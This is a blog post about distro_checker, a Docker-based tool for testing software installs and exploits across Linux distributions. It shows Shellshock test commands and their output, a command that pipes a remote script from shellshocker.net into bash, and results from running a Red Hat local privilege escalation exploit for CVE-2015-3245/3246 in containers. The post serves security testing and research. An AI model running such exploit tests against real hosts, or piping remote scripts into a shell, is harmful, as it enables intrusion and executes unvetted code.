Introduction:
We were looking for an easy way to do testing for the installation of our tool, Faradayhttps://github.com/infobyte/faraday with different distributions.
What we ended up finding to suit our needs was Docker, which is pretty similar to a chroot, but on large amounts of steroids.
Docker is a tool that automates the deployment of applications inside software containers, by providing an additional layer of abstraction and automation of operating-system-level virtualization on Linux. Docker uses resource isolation features of the Linux kernel such as cgroups and kernel namespaces to allow independent "containers" to run within a single Linux instance, avoiding the overhead of starting and maintaining virtual machines
The process we developed is pretty simple, in which we use a simple list of distributions.
- We generate a Docker
- We install Faraday
- We connect using the SSH to the container, exporting the X and we execute the graphic application (GUI QT)
We are using this process daily in our own continuous-integration system.
Cross Distribution Exploit Testing:
Using the same implementation, we can use it to do some exploitation tests in different distributions. This allows us to evaluate different scenarios and hopefully helps us make our exploits a bit more robust :)
Not all the vulnerabilities can be tested using this tool, because kernel's related problems can
't be exploited because Docker isn't a virtualization system. This includes a few simple vulnerabilities such as file permission, file race condition, environment variable code injection, etc.
The tool contains the following elements:
- docker_build.py: This script function is to generate images of each distribution and run docker_launch.py.
- docker_launch.py: This is the one that finally connects through the SSH and executes our command in the selected container.
- images.txt: A list of images to use
- extras/: Libraries and base Dockerfile used for generation of the images.
- root/: Here, we find private keys for the ssh connection, which are necessary for testing out the GUI tests.
Case 1 - Shellshock:
A simple example to try would be shellshock:
$ ./docker_build.py -c "env x='() { :;}; echo vulnerable' bash -c \\\"echo this is a test\\\""
Start build docker: debian:7.3
..
Run build docker: debian:7.3, id: fae1bc04-b514_debian:7.3
./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"' -t fae1bc04-b514_debian:7.3
['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'root@172.17.0.93', 'env x=\'() { :;}; echo vulnerable\' bash -c "echo this is a test"']
vulnerable
this is a test
Run build docker: ubuntu:14.10, id: a07132a4-af14_ubuntu:14.10
./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"' -t a07132a4-af14_ubuntu:14.10
['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'root@172.17.0.94', 'env x=\'() { :;}; echo vulnerable\' bash -c "echo this is a test"']
this is a test
This creates 2 images (debian7.3, ubuntu 14.10) and for each image, you have to execute the exploit CVE-2014-6271
We can utilize a script to make it a little more organized;
$ ./docker_build.py -c "cd build && ./shellshocker.sh" #docker_build.py copy in the images all the content "." in the directory ./root/build
Run build docker: debian:7.3, id: 75b78a22-03a1_debian:7.3
CVE-2014-6271 (original shellshock): VULNERABLE
./shellshock_test2.sh: line 17: 29 Segmentation fault shellshocker="() { x() { _;}; x() { _;} <<a; }" bash -c date 2> /dev/null
CVE-2014-6277 (segfault): VULNERABLE
CVE-2014-6278 (Florian's patch): VULNERABLE
CVE-2014-7169 (taviso bug): VULNERABLE
CVE-2014-7186 (redir_stack bug): not vulnerable
CVE-2014-7187 (nested loops off by one): not vulnerable
CVE-2014-//// (exploit 3 on http://shellshocker.net/): not vulnerable
Also, for a more automated implementation, with the exception that we use the option -i in order to go to a list of images to execute.
$ ./docker_build.py -c "curl https://shellshocker.net/shellshock_test.sh | bash" -i images.txt
In case you want to try testing again something specific for a container all you need to do is run:
$ docker ps -a # verify which is the image generated and use this id with docker_launcher in the option -t
$ ./docker_launcher.py -c "whoami" -t c92d6bf7-d559_debian:7.3
Case 2: Redhat Local Privilege Escalation CVE-2015-(3245,3246):
Last week two vulnerabilities were released that can be use to do a local privilege escalation on
CVE-2015-3245 userhelper chfn() newline filtering
CVE-2015-3246 libuser passwd file handling
Let's try again the tool against this vulnerability in the following distribution rhel6.5', 'rhel7.0', 'rhel7.1', 'fedora:20 :
$ ./docker_build.py -i redhat_images.txt -d extras/docker/Dockerfile.redhat -c id # In this scenario I directly use a specific dockerfile that runs the exploit (roothelper.c)
Distros: ['rhel6.5', 'rhel7.0', 'rhel7.1', 'fedora:20']
Start build docker: rhel6.5
...
Red Hat Enterprise Linux Server release 6.5 (Santiago)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: rhel7.0
Red Hat Enterprise Linux Server release 7.0 (Maipo)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: rhel7.1
Red Hat Enterprise Linux Server release 7.1 (Maipo)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: fedora:20
Fedora release 20 (Heisenbug)
CVE-2015-(3245,3246): Not vulnerable
...
Demo:
Clean:
After a few tests, it's important not forget to stop the containers and delete them:
$ docker stop $(docker ps -a -q)
$ docker rm $(docker ps -a -q)
You have to for the images as well:
$ docker rmi $(docker images -q)
Tool:
The code can be found on github:http://github.com/infobyte/distro_checker
To-Do:
Doing a similar process using Vagrant, we would be able to try out all kinds of vulnerabilities, as that would be a complete virtualization setting.We hope this helps everyone in the need test their tools across a wide range of distributions, from researchers to developers their code.
Thanks Andres for the support!
ليست هناك تعليقات:
إرسال تعليق